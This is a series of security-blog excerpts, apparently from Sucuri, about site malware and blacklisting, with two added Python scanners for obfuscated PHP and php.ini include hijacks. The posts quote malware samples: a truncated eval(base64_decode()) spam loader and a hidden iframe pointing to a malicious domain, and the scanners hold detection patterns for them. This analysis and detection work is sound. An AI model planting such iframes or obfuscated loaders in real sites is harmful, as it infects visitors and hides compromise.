DreamHost Security Issue Prompts FTP Password Resets

Yesterday on the DreamHost Status Blog, it was announced that all shell/FTP passwords would be reset due to what looks to be a security breach that was discovered on one of the DreamHost database servers.

DreamHost looks to have done a great job notifying affected customers via the update page, keeping them up to date throughout the day until the issue was resolved. It looks like all FTP passwords were indeed reset.

We recommend that all DreamHost customers log into their accounts and check their account status. It is encouraged that you change your account passwords, and it wouldn’t hurt to change your FTP and database passwords again just to make sure.
Read more.


Posted in DreamHost, FTP, hacked, htaccess, Passwords, pharma, sucuri

Funny Spammers: Any Reproduction of This Document in Part or in Whole is Strictly Prohibited

Spam is nothing new, but a recent site we were reviewing was a bit different. After a bit of analysis, we found a file called tracks.php that was generating spam with the following code on it:

<?php // Any reproduction of this document in part or in whole is strictly prohibited. For educational purposes only. 1993-2011 (c)
error_reporting(0) ;eval ( base64_decode("JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMG..

Read more.


Posted in malware, malware_updates, pharma, spam

Better Engagement and Giving Back

Hi folks, we’re really excited about 2012, specifically because of our goal to give back more. This is in line with our core theme, to help the end-user better secure their environments. Things are not always perfect, but we strive to be there for you when everything else seems to be going wrong.

One of the new items we’ll be implementing this year will be quarterly management meetings. For those that don’t know, we are a virtually distributed team spanning across North and South America. The purpose of these meetings will be to continue to improve our services, address issues we see everyday, and look to the future.
Read more.


Posted in community, sucuri, team

Ask Sucuri: Why Do I Only Get Malware Warnings on Certain Browsers?

A few days ago, our scanner alerted that a site had malware related to the Blackhole Exploit Kit. The owner of the site said that when he visited the site, nothing happened, and the malware wasn’t displayed – probably thinking it was a false positive.

After a bit of manual testing, we noted that the malware was only being displayed to certain browsers (IE and Chrome on Windows), and not on the others.

Once we got access to the site, we learned why. It had the following code on the index.php file:
Read more.
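A defender-side check that covers both the tracks.php spam generator above (error reporting silenced, eval() over base64_decode()) and the index.php that only serves its payload to certain browsers: an added Python scanner, not Sucuri's code, that flags those patterns in PHP sources. The sample files, rule names and the iframe URL are constructed here for illustration.

```python
import re
from pathlib import Path
from typing import Dict, List

# Constructed samples (not the real files from the posts): a spam generator that silences
# errors and runs an eval(base64_decode()) payload, an index.php that only emits an iframe
# to IE/Chrome visitors on Windows, and a clean control file.
SAMPLE_FILES = {
    "tracks.php": (
        "<?php // Any reproduction of this document in part or in whole is strictly prohibited.\n"
        "error_reporting(0) ;eval ( base64_decode(\"JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMG\") );\n"
    ),
    "index.php": (
        "<?php\n"
        "$ua = $_SERVER['HTTP_USER_AGENT'];\n"
        "if (strpos($ua, 'Windows') !== false &&\n"
        "    (strpos($ua, 'MSIE') !== false || strpos($ua, 'Chrome') !== false)) {\n"
        "  echo '<iframe src=\"http://example.invalid/x\" width=\"1\" height=\"1\"></iframe>';\n"
        "}\n"
    ),
    "clean.php": "<?php echo 'hello'; ?>\n",
}

# (rule name, pattern, why it matters); patterns are loose on whitespace because the
# malware on this page spaces its calls oddly ("eval ( base64_decode(").
RULES = [
    ("eval_base64", re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
     "eval() over base64_decode(): obfuscated payload loader"),
    ("errors_silenced", re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
     "error_reporting(0): hides fatal errors raised by injected code"),
    ("ua_gated_iframe", re.compile(
        r"HTTP_USER_AGENT[\s\S]{0,400}?(?:MSIE|Chrome|Windows)[\s\S]{0,600}?<iframe", re.I),
     "output branches on the User-Agent before emitting an iframe"),
]
DESCRIPTIONS = {name: why for name, _, why in RULES}

def scan_php(source: str) -> List[str]:
    """Return the names of all rules that match one PHP source text."""
    return [name for name, pattern, _ in RULES if pattern.search(source)]

def scan_files(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each path to its rule hits, omitting files with none."""
    return {path: hits for path, source in files.items() if (hits := scan_php(source))}

def scan_directory(root: str) -> Dict[str, List[str]]:
    """Apply the same rules to every .php file under a real directory."""
    return scan_files({str(p): p.read_text(errors="replace") for p in Path(root).rglob("*.php")})

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(path, "->", "; ".join(DESCRIPTIONS[h] for h in hits))
```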


Posted in hacked, malware, malware_updates, virus

WordPress 3.3 XSS Vulnerability Patched (3.3.1 Released)

We just learned of a reflected XSS vulnerability in WordPress 3.3 via the comments form (wp-comments.php). It is explained in detail here.

According to the disclosing party, the vulnerability can only be triggered via Internet Explorer; our tests led to the same result.

To further note, this is hard to reproduce because it does not get triggered when WordPress is installed via a domain. If you’re running WordPress 3.3, and WordPress was installed via a domain, you’re not vulnerable. (ethicalhack3r)

We do not consider this to be a serious vulnerability; however, we recommend updating to WordPress 3.3.1 since the vulnerability can be used in targeted attacks. More info on the release can be found in the WordPress Codex and in the release post.


Posted in vulnerability, wordpress, xss

Happy New Year From the Sucuri Team

Just a quick message to thank everyone that worked with us during 2011 (clients, partners and friends), and to wish a wonderful 2012 to all of you.

We have some cool projects and posts to share in the near future, so stay tuned for updates soon.


Posted in sucuri

Blacklist Warnings for Users of the Stream-Video-Player WordPress Plugin

If you are using the plugin stream-video-player, it might be a good idea to disable this plugin for now.

The plugin loads a Flash player from "http://rod.gs/_SVP/5.7.1896/player.swf?ver=1.3.2", a domain (rod.gs) which is currently blacklisted by Google, so anyone visiting your site will get the cross-site warning message. Since it is a popular plugin (with more than 100k downloads), this could be affecting quite a few websites.
Read more.


Posted in blacklist, blacklisted, malware, malware_updates, plugin, wordpress

Malware Being Called From Your php.ini File

Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory and look in your main configuration files (especially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:

Read more.
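The check a practitioner would want here, as an added example that is not Sucuri's code: a Python parser for php.ini that reports include directives pointing outside the locations you expect. Since the excerpt stops before naming the setting, the example inspects auto_prepend_file and auto_append_file, the two directives that make PHP include a file on every request; that choice, the sample file and the trusted prefixes are assumptions, not the post's finding.

```python
from typing import Dict, List

# Constructed php.ini excerpt for illustration, not the file from the compromised servers.
# Which directive the attackers added is an assumption here (see the lead-in).
SAMPLE_PHP_INI = """\
[PHP]
engine = On
display_errors = Off
auto_prepend_file =
auto_append_file = "/var/tmp/.cache/sess.php"
; auto_prepend_file = /usr/local/lib/php/legit.php   (commented out, must be ignored)
"""

# Directives that cause PHP to include a file before/after every script it runs.
INCLUDE_DIRECTIVES = ("auto_prepend_file", "auto_append_file")
# Prefixes under which an administrator might legitimately keep such a file (assumption).
TRUSTED_PREFIXES = ("/usr/local/lib/php/", "/etc/php/")

def parse_ini_directives(text: str) -> Dict[str, str]:
    """Active key = value pairs from php.ini text; comments and section headers are
    skipped, and a later definition overrides an earlier one, as PHP itself does."""
    directives: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # ';' starts a comment
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        directives[key.lower()] = value.strip("\"'")
    return directives

def find_injected_includes(text: str) -> List[str]:
    """Report include directives that are set and point outside the trusted prefixes."""
    findings = []
    for key, value in parse_ini_directives(text).items():
        if key in INCLUDE_DIRECTIVES and value and not value.startswith(TRUSTED_PREFIXES):
            findings.append(f"{key} = {value}")
    return findings

def check_php_ini(path: str = "/etc/php/php.ini") -> List[str]:
    """Run the check against a real php.ini (default path is the one named in the post)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_injected_includes(fh.read())

if __name__ == "__main__":
    for finding in find_injected_includes(SAMPLE_PHP_INI):
        print("suspicious include directive:", finding)
```

Run check_php_ini() on each php.ini the server actually loads (php --ini lists them), since a value here executes on every request regardless of what is in the web root.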


Posted in hacked, malware, malware_updates, vulnerability

Ask Sucuri: How Long Does It Take For a Site To Be Removed From Google’s Blacklist? – Updated

If you have any questions about malware, blacklisting, or security in general, send them over to us at contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, click here.

This is an update to our previous post about Google blacklisting. We have some updated numbers to share.

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean. However, it is still blacklisted by Google. How long until they remove us?

Answer: This is a very common question. In fact, every time we clear a hacked site, its owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, we started to time how long it takes from when the review submission is requested, until the site is reviewed and removed by Google. We have now measured a few hundred blacklist removals and we have some good numbers to back up our tests.

Current Results:

  • Average time from submission to removal: 440 minutes (about 7 hours)
  • Maximum time: 792 minutes (about 13 hours)
  • Minimum time: 290 minutes (a bit less than 5 hours)

On average, it takes Google around 7 hours to clear your “bad” website from their lists. For our lucky clients, it takes roughly 5-6 hours. Another important point that some people forget is that you need to request a review! Google will not automatically remove a site once cleaned.

How do you increase your odds of getting cleared faster?

  1. Make sure to clean everything up!
  2. Do not remove the infected files, fix them. If you remove them, they will 404, and a 404 will delay the verification (even if you need to leave the file with a 0-size, don’t remove it until after the site is de-listed).
  3. Follow best practices to increase security on your site so that you minimize the risk of reinfection.

That’s it. Let us know if you have any questions or comments.


Is your site hacked? Blacklisted? We are here to help! We can get your sites cleaned up and secured right away!


Posted in ask, blacklist, blacklisted, google, sucuri

WordPress 3.3 is Out

For all our WordPress users, please remember to update to WordPress 3.3, which was just released. It should be a quick 1-click process in your dashboard, and nobody has an excuse not to do so.

And if you are currently using any version before 3.2.1, you better run!

Thanks,


Posted in wordpress